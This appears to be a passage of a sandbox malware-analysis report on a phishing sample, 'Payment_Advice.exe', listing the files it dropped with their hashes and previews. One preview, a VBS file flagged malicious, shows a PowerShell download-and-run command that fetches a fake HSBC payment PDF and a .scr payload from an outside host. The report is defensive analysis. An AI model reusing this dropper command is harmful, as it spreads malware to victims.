                                                    SHA1:92B479AE0A1A060F9F5B94702E6CB11B10F051A9
                                                    SHA-256:014EBA747EC815F22B9D6A0E037AD011F6A0873E27B38F9C36B7A86A0CFC3A04
                                                    SHA-512:8DDBFBE293915C9F11739508E079CB22C3A6C6E5772A01C6D91A7EBCB5CABC5E58DEF30963516768643F16EA4FC3BFC4E56E325ADEBE86B30B0A750E8782DECA
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):5.279673600632401
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfbPtdPeUkwRe9:YvXKXRKsdTeOGuGDV8Ukee9
                                                    MD5:FB886F257B9B827DF744C6FC3F722DA0
                                                    SHA1:DA303AB143666976687AC985229D4BBC331C1600
                                                    SHA-256:0E706AB2E68F32A7F28D5A4CC7B4F3BEDCE43335440EF3257C3BFDD61448B4E7
                                                    SHA-512:44D2DE2885359434D88F7368A651CEA2864C352ADED24486014E2EF6E6D380AE2F2990F4459FC5C9DC9465A35D15738972A03C66FD5BB8E149924FE3F50CCD78
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):287
                                                    Entropy (8bit):5.2842710672471425
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJf21rPeUkwRe9:YvXKXRKsdTeOGuG+16Ukee9
                                                    MD5:8E4795B9A4030B9FA29CE461E7A33229
                                                    SHA1:AD839812C734817EE98472780D1278E8B10F6187
                                                    SHA-256:D2E49C4EB9613B0B771FA26B1C3CE1FFD318C12DD6D233959E86FE5A6A5C186D
                                                    SHA-512:9C17A5E69E66947846F27630B594D17622E20D4FE08F92510C9BF56C5955BEB95821EFCF6FD618A64D2C55D945B2A52F96AC6A7E24974202FBA457D3C2391612
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.30321230303391
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfbpatdPeUkwRe9:YvXKXRKsdTeOGuGVat8Ukee9
                                                    MD5:961BECA4CB11C002F2B0095243991CEC
                                                    SHA1:7411736C90825F3A0661314B61FAA9321B860469
                                                    SHA-256:631185BEFAA165509D78276263E077C0E7FF2EC9AF6F2AFBA2DCA32B36A5EF91
                                                    SHA-512:1E92EB7C0F5D93C5BE1F851CD032B19105FA473A722698CB7BE909A5E2B89E6F251FA92B61340C5C730CEC312399EAC2356865086E739C08AFD73ABB0C24A342
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.2601790688979415
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXDEgjsKPqYWsGiIPEeOF0Y6pRoAvJfshHHrPeUkwRe9:YvXKXRKsdTeOGuGUUUkee9
                                                    MD5:D1B1E5C98FAF5F4E2E682569B5B945FB
                                                    SHA1:F0C40B1D6F691DDF95269583493D02A07F8A0FB1
                                                    SHA-256:A30054D460679C3CAD51689C32A5D19A6438F0B881780F313FF7B1FE7D79FC85
                                                    SHA-512:E37E5F3FA20FACAE919C32FB5364B4B29BF7BE7D6752CF10544802E063ECA51423AEE5BF90128E4EDE7BEC4874AE6C42678196AB73942A79315BE7526ED7F2A6
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):782
                                                    Entropy (8bit):5.3802923134982485
                                                    Encrypted:false
                                                    SSDEEP:12:YvXKXRKsdTeOGuGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWB:Yv6XRKmeOr168CgEXX5kcIfANho
                                                    MD5:E376415CC34CC851F03B3044AAF04678
                                                    SHA1:4CB36C2B34CA53149A1DA71FBA1F21F0F273768A
                                                    SHA-256:80F217DF378D90EC8B86857B222BC6C464296C5465A15C632FBC86D990FCEEE9
                                                    SHA-512:DB73F15FE28B8C86155521BBDB7FF948519218814168ACC4586774C73CD7D3A68F841D86C6AFB544B4935DEDFD574DF1359C5AFC75DD9EB074E8EE8374C4A81E
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"4a5b680a-ef14-4fec-b4b5-b0d12f733edb","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1714747221874,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1714569441909}}}}

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4
                                                    Entropy (8bit):0.8112781244591328
                                                    Encrypted:false
                                                    SSDEEP:3:e:e
                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                    Malicious:false
                                                    Preview:....

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2814
                                                    Entropy (8bit):5.139979820267355
                                                    Encrypted:false
                                                    SSDEEP:24:YUlUW2SCfiWcO/D7iVKQBda7ay62K+LjWbEbj0SBZt2nF26V2LSDgCPiC5e29Lni:YG52lc6H0KQeTVEF2yBHiCs29ct
                                                    MD5:6F037FF4E8214AED857C48599510C26F
                                                    SHA1:90B6565E337D1419F7A1A56878DDA53624340031
                                                    SHA-256:2363E8684E02796F0E585CBE3E0857D41433BA4A408A490CBAA3D518E627A524
                                                    SHA-512:5DEEE224596E67252D07B8B62ABBD57A596249B962E825525E2765EC8B75452374ABC2707BCFAFBBBD0FECFB3084182C7BF0EFC449A19EFA7E89DFEB476D5578
                                                    Malicious:false
                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"155268ffec5c5934bdc581188be25297","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1714569441000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"126522d340aa5125b961831f70e01a51","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1714569441000},{"id":"Edit_InApp_Aug2020","info":{"dg":"bfa7514a148c16c0619675a0b9a155c5","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1714569441000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"ff7934f37b8162ec1d83b7bec38bf26c","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1714569441000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"5e8fe773946a972688d8c72f739ad38c","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1714569441000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"93b5a62877b3e7b24d2c13612c415b35","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1714569441000},

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):1.4515633555554874
                                                    Encrypted:false
                                                    SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsflp:lNVmsw3SHtbDbPe0K3+fDZdU
                                                    MD5:D6191CE835867178F54AC45EAF562B42
                                                    SHA1:61587447BBEA623C9DBC4023644B8136B5B7DE9B
                                                    SHA-256:5A38505095AFBF15FAFF45F9E5A523E0CA4D986C32175F4D3C3A279A6B423B44
                                                    SHA-512:EA7398D850B02AEDE26A70C53C52839DD87D9B1B9DD3A1FE1D4D76CB402527C32E391B401BCDD7AED28431483647E6B1DE733CA426FE2E00BF23133D25800267
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):1.953630380360256
                                                    Encrypted:false
                                                    SSDEEP:48:7MTrvrBd6dHtbGIbPe0K3+fDy2dsW7qFl2GL7msy:7u3SHtbDbPe0K3+fDZdLKVmsy
                                                    MD5:46B9DFA88BA44FEC9BB23F1276A5623E
                                                    SHA1:B01544788640E91A693BDDC68EEFEDB53484D0E8
                                                    SHA-256:F22786A2A5FBCCFF1ED93CD85483CE901B9E509A9E7B9B99742ECFE3C19C603C
                                                    SHA-512:27B5BF200C21AF480649005E96FA0A24C5BBE1862D5C0D298ED69F7FFC6F8A43C356591878DDFD5AF1984B6DF0347497314FAD70ADCCC0D808112183895A36AB
                                                    Malicious:false
                                                    Preview:.... .c.......1.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):706
                                                    Entropy (8bit):5.349842958726647
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                    MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                    SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                    SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                    SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hadvices.scr.log

                                                    Download File
                                                    Process:C:\Windows\Temp\hadvices.scr
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):706
                                                    Entropy (8bit):5.349842958726647
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                    MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                    SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                    SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                    SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11608
                                                    Entropy (8bit):4.887486353364779
                                                    Encrypted:false
                                                    SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdzVFn3eGOVpN6K3bkkjo5LgkjDt4iWN3yBGHB9sT:lVib49PVoGIpN6KQkj2kkjh4iUx4cYK6
                                                    MD5:E3CC2E628C73E9D29D58817DFC1ADCC5
                                                    SHA1:3720336F2BCB67ADACD9FED9645AC3FFDC67928D
                                                    SHA-256:6C52B5B7085CA1A5EB18B7C7FF740BEC18D0911CCF7B321B4668EF725A912F3B
                                                    SHA-512:6C5DC96D036DD24BE29720F1568EE70DB069EE5F3F91D59289A9E597C699D4BEBEBA5525B43B3BC7EAE3D467211C6826137FEF1A57E42593DB6E308A2237EE32
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul3nqth:NllUa
                                                    MD5:851531B4FD612B0BC7891B3F401A478F
                                                    SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                    SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                    SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                    Malicious:false
                                                    Preview:@...e.................................&..............@..........

                                                    C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1634
                                                    Entropy (8bit):3.551963477893781
                                                    Encrypted:false
                                                    SSDEEP:24:T8umgCjOO5OWWeiVhfzBpnUMkWBiGfzzX+mzUMkWD+m862DeynNCjOy3:T8upCjO2We+tfHY8bLHLB2DlnIjd3
                                                    MD5:95DB312E30DD0364924E7B45D1AB6FA8
                                                    SHA1:1FF6577F81C4DF9FC6BF0B91E7421E46A24D43DE
                                                    SHA-256:E469EA6ED5267E8984305A6F6EFCB3D2942199B80E06C340C7199B82CFF230F9
                                                    SHA-512:6236BE94169639CB2B202B7741256CA1A3E39E8DE8AAA14A957F2BD18FE1953DAD3ACA2BB2597505EE2C7120DB6D34FC4C5CBB9756945034CAF00FC7F553AAD5
                                                    Malicious:true
                                                    Preview:S.u.b. .R.u.n.P.o.w.e.r.S.h.e.l.l.C.o.m.m.a.n.d.(.)..... . . . .D.i.m. .o.b.j.S.h.e.l.l.,. .p.s.C.o.m.m.a.n.d......... . . . .'. .C.r.e.a.t.e. .S.h.e.l.l. .o.b.j.e.c.t..... . . . .S.e.t. .o.b.j.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)......... . . . .'. .C.o.m.b.i.n.e.d. .P.o.w.e.r.S.h.e.l.l. .c.o.m.m.a.n.d.s. .t.o. .r.u.n..... . . . .p.s.C.o.m.m.a.n.d. .=. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.C.o.m.m.a.n.d. .".".I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'. .-.O.u.t.F.i.l.e. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.P.a.y.m.e.n.t._.A.d.v.i.c.e...p.d.f.'.;. .I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .'.h.t.t.p.s.:././.a.d.v.i.s.i.n.g.-.r.e.c.e.i.p.t.s...c.o.m./.h.s.b.c./.h.a.d.v.i.c.e.s...s.c.r.'. .-.

                                                    C:\Users\user\AppData\Local\Temp\MSI4e076.LOG

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.5030768995714583
                                                    Encrypted:false
                                                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K80QQRIKlYH:Qw946cPbiOxDlbYnuRKzI+YH
                                                    MD5:4D83892F6EE2B2F86D3DDAECFF1250E2
                                                    SHA1:465969122223224693317BE1690A094D01922271
                                                    SHA-256:DC42AA189D385A5C32B20A5DCDF2F0FD7399166A02A9CD7CAAD3442597268415
                                                    SHA-512:616F4D855782B76E6D8612CEAA0CA6452DBFA383000BE9F4DA0B2EFF0515F6B7A50C9F0AF44A2DAE0D0EC083E23F3F7DCAABB8C10FBF943E213AF85199F79950
                                                    Malicious:false
                                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.1./.0.5./.2.0.2.4. . .1.5.:.1.7.:.2.0. .=.=.=.....

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfkztsop.5yd.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k51jbhqe.hkh.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-01 15-17-11-261.log

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393)
                                                    Category:dropped
                                                    Size (bytes):16525
                                                    Entropy (8bit):5.386483451061953
                                                    Encrypted:false
                                                    SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                    MD5:F49CA270724D610D1589E217EA78D6D1
                                                    SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                    SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                    SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                    Malicious:false
                                                    Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15111
                                                    Entropy (8bit):5.366813486546421
                                                    Encrypted:false
